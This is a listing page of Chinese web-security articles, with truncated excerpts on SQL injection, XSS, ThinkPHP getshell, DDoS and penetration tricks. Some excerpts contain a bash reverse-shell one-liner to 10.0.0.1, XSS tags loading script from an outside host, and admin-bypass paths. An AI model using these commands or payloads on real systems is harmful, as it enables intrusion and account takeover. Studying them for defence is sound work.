小编 SQL注入黑客防线网站实例分析
今天到黑防站上去看看文章,可能出于“职业”习惯,看到?classid=1之类的东东就不由自主的想加点什么参数进去。 当在页面http://www.hacker.com.cn/article/index.asp?classid=3...
也想出现在这里?
联系我们吧
网站个人渗透技巧收集与总结
1.利用网站过滤不严直接绕过后台验证,在网站后面加上 admin/session.asp 或 admin/left.asp 2.有的网站进后台会出现一个脚本提示框,输入:administrator 即可突破!admin代表以管理员身份进入的意思。 3....
Linux 下多种编程语言的反弹 shell 方法
bash命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 perl版本:perl -e \’use Socket;$i="10.0.0.1";$p=1234;...
网站MYSQL数据库高级爆错注入原分析
这里主要用了mysql的一个BUG :http://bugs.mysql.com/bug.php?id=8652 grouping on certain parts of the result from rand, causes a duplicate...
thinkphp代码执行getshell的漏洞解决
先来简单说说前天thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell 影响的范围: 5.x < 5.1.31, <= 5.0.23 漏洞危害: 导致系统被提权(你懂的) 这里附上一个自...
详解如何通过“鼠洞”控制电脑
入侵电脑防御是为了更好的做好防御准备,网络安全需要我们大家来维护,一起来看看通过“鼠洞”控制电脑吧。 通过“鼠洞”控制你的电脑 夜黑风高,一个黑色的身影窜入了一间电脑机房。熟练地打开了一台保存...
分享PHP场景中getshell防御思路
1 背景概述 WEB应用漏洞导致的入侵时有发生,扫描器和WAF并不能解决所有的问题,于是尝试在主机侧针对PHP环境做了一个防御方案。很荣幸的邀请到TSRC部分白帽子做了一次对抗演习,本文主要分享一下防御思路。 防御方案主要想解决的问题是getshell...
XSS攻击常识及常用脚本
一、什么是XSS? XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。 二、XSS分类 XSS有三类:反射型XSS(非持久型)、存储型XS...
浅谈史上最大DDoS攻击的本质与防范
ddos攻击的意思是指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,最后可以成倍地提高拒绝服务攻击的威力。 DDos攻击在今天看来并不新鲜,近两年来发展态势也渐趋平缓,直至一个月前,欧洲反垃圾邮件组织Spa...
SQL注入测试实例分析
本文详细讲述了 sql注入的原理及防范技巧,目的是让初学者利用SQL注入技术来解决他们面临的问题, 成功的使用它们,并在这种攻击中保护自己。希望能对大家有所帮助。 一、 介绍 当一台机器只打开了80端口, 你最依赖的漏洞扫描器也不能返回任何有用的内...
XSS攻击汇总 做网站安全的朋友需要注意下
(1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=htt...
使用爬虫采集网站时,解决被封IP的几种方法
方法1.之前由于公司项目需要,采集过google地图数据,还有一些大型网站数据。经验如下:1.IP必须需要,像@alswl 说的非常正确,ADSL。如果有条件,其实可以跟机房多申请外网IP。2.在有外网IP的机器上,部署代理服务器。3.你的程序,使用轮...
